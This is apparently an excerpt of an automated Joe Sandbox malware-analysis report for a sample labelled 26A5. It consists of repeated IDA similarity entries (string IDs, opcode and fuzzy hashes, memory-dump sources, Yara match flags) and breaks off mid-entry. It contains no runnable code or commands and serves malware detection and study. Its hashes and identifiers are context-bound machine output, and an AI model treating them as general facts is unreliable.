                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: #=0$Z$ut
                                                                                                                                                                                                                              • API String ID: 0-1971374411
                                                                                                                                                                                                                              • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                              • Instruction ID: 912b371f271db1c0bd89a4865859cd5a59f8c129aceb9260ecbe6b8bbea0bdfb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5181043120C3828AD7098F39C55076BFFE1AFD3218F1C9AADD4D69B692D729C50AC752
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-2390459867
                                                                                                                                                                                                                              • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                              • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 8<j?$D$4b
                                                                                                                                                                                                                              • API String ID: 0-2390459867
                                                                                                                                                                                                                              • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                              • Instruction ID: 95afdafd7916c8f1ca3d2ddef236405f89b83cce1c14d49f83bd7e7898a6e8a0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A81F9652483818BD719CF3994A537EFFD29FD6218F1C896DE4D28B281D339C506CB16
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: D`a&$NMNO$h.^
                                                                                                                                                                                                                              • API String ID: 0-1315737531
                                                                                                                                                                                                                              • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                              • Instruction ID: d94846ff90ee24fb204f487b56b73f768f48672c4cd92d0abbdd648e6adabf4c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 128133312483454BD318EF28CCC1A6BB7A3EFC5728F2D866CE5A547391DB3298098B52
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: :;$h.^
                                                                                                                                                                                                                              • API String ID: 0-747822033
                                                                                                                                                                                                                              • Opcode ID: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
                                                                                                                                                                                                                              • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: :;$h.^
                                                                                                                                                                                                                              • API String ID: 0-747822033
                                                                                                                                                                                                                              • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                              • Instruction ID: ae0194501c182469e55f86efb0be6ebf17ac8938b7980bececd71b15d0594381
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAA1F371A853109BD710AF28CC86B7FB3E5EF81368F098528EC959B281E379ED15C752
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: NP,?$h.^
                                                                                                                                                                                                                              • API String ID: 0-3351239477
                                                                                                                                                                                                                              • Opcode ID: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
                                                                                                                                                                                                                              • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: NP,?$h.^
                                                                                                                                                                                                                              • API String ID: 0-3351239477
                                                                                                                                                                                                                              • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                              • Instruction ID: ec26946d6ae7f8ebe2ec2c5e29e6042a3e2d7d03cfb99c5e8e112d84c8ebbdb0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECA12671A843109BD724CF28C8C1B3BB7B6EBC5728F19862DE59867290D731E805CBD5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: _\]R$h.^
                                                                                                                                                                                                                              • API String ID: 2994545307-299036012
                                                                                                                                                                                                                              • Opcode ID: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                              • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: _\]R$h.^
                                                                                                                                                                                                                              • API String ID: 0-299036012
                                                                                                                                                                                                                              • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                              • Instruction ID: 36863653bb968bec4bd443fde4aef8d948a9026e4789fe196c4703b09c244c28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73912B31A483919BCB19EF28C890A7FB7E2EFD9314F19856CE8C597291D731D805CB86
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: o~$yr
                                                                                                                                                                                                                              • API String ID: 0-1013308823
                                                                                                                                                                                                                              • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                              • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: o~$yr
                                                                                                                                                                                                                              • API String ID: 0-1013308823
                                                                                                                                                                                                                              • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                              • Instruction ID: 32de0674905e63ca8743359de657c26bf845ece1394654c615bd51201f1a2102
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE9116769483508BD320DF19C854A6FF7E2EFC5328F09892CE9D95B391E7B48906C786
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: =^"\$h.^
                                                                                                                                                                                                                              • API String ID: 0-1372019446
                                                                                                                                                                                                                              • Opcode ID: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                              • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: :7$%$:7$%
                                                                                                                                                                                                                              • API String ID: 0-2391988857
                                                                                                                                                                                                                              • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                              • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: :7$%$:7$%
                                                                                                                                                                                                                              • API String ID: 0-2391988857
                                                                                                                                                                                                                              • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                              • Instruction ID: d6375161fb3fcb79b2b2e762b408ef53e8848c0efce6f50c74da09c9b7df2a74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C21B0B11183908BD7089F79C964B6FFBE5BBC6318F145A2DE1D287291DBB4C409CB82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^$
                                                                                                                                                                                                                              • API String ID: 0-2485598210
                                                                                                                                                                                                                              • Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                              • Instruction ID: 6a014a1bd68a230b1108bf68cfb381ec75011851fde79ef784bd30536d0f2c7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4811E271358290AFD3648B24CD8676B73EBABC2324F288A68D5E4872D1DB76D8408A05
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: MO$MO
                                                                                                                                                                                                                              • API String ID: 0-3148518880
                                                                                                                                                                                                                              • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                              • Instruction ID: 21a801dfac3eec6d2f2ee934ea529414c903f7b7da75471035c274044e5e3eae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0511A0741842818BEF548F64DD916677FA0EF42220F1499D8DC895F38BCB34C601CF64
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 7&'$$vA\
                                                                                                                                                                                                                              • API String ID: 0-2621209329
                                                                                                                                                                                                                              • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                              • Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 7&'$$vA\
                                                                                                                                                                                                                              • API String ID: 0-2621209329
                                                                                                                                                                                                                              • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                              • Instruction ID: 7e2d9210150414b9633ff9980fc26715cd78b1f1d5a8742d936cba68e8dcd775
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31F068346545944BDB918F3D98996BE67F0E757224F302AB5C65AE32A2C731C4818F08
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02157E61
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 237503144-0
                                                                                                                                                                                                                              • Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                              • Instruction ID: a42b78649fe573acd85188c85d4002d915f7d8be64cdab6be6ad0587f5e6df66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACB123729487218BC314CF28C4923AAF7E2FFD9314F19966CE8D55B294E7349902C785
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                              • Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ''
                                                                                                                                                                                                                              • API String ID: 0-694448769
                                                                                                                                                                                                                              • Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                              • Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ''
                                                                                                                                                                                                                              • API String ID: 0-694448769
                                                                                                                                                                                                                              • Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                              • Instruction ID: 9e01e3d373cfd703153b01b7746b7dab3f0c10aef1927c3f1d4a10c39b87d65d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 839101B1658320CBC3148F28C89166BBBF2EFC5364F18996DE8E58B790E774C505C796
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *+
                                                                                                                                                                                                                              • API String ID: 0-2181965719
                                                                                                                                                                                                                              • Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                              • Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: UXY^
                                                                                                                                                                                                                              • API String ID: 0-1486013802
                                                                                                                                                                                                                              • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                              • Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
